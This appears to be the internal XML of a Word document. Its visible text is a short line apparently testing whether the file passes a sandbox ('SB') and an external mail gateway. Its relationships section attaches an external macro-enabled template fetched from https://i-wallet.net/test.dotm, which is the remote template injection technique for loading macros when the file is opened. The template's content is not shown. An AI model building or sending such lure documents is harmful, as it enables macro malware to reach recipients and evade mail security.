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Esc4n0rs Esc4n0rs</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Esc4n0rs Esc4n0rs</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-28T09:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-28T09:44:00Z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\_rels\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https://i-wallet.net/test.dotm" TargetMode="External" /></Relationships>
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5402" w14:textId="77777777" w:rsidR="002C1593" w:rsidRDefault="002C1593" w:rsidP="002C1593">
      <w:r>
        <w:t xml:space="preserve">Hey oh Lets go! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245AABEB" w14:textId="77777777" w:rsidR="002C1593" w:rsidRDefault="002C1593" w:rsidP="002C1593"/>
    <w:p w14:paraId="45820C05" w14:textId="77777777" w:rsidR="002C1593" w:rsidRDefault="002C1593" w:rsidP="002C1593">
      <w:r>
        <w:t>Trying this application to see whether it goes through the SB and ExMailGW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163B02E0" w14:textId="77777777" w:rsidR="00C2318D" w:rsidRDefault="00C2318D"/>
    <w:sectPr w:rsidR="00C2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93"/>
    <w:rsid w:val="002C1593"/>
    <w:rsid w:val="00C2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B774"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5BF145FF-0A46-4FD8-B607-61CA7ABECF91}"/>
  <w:attachedTemplate r:id="rId1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593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4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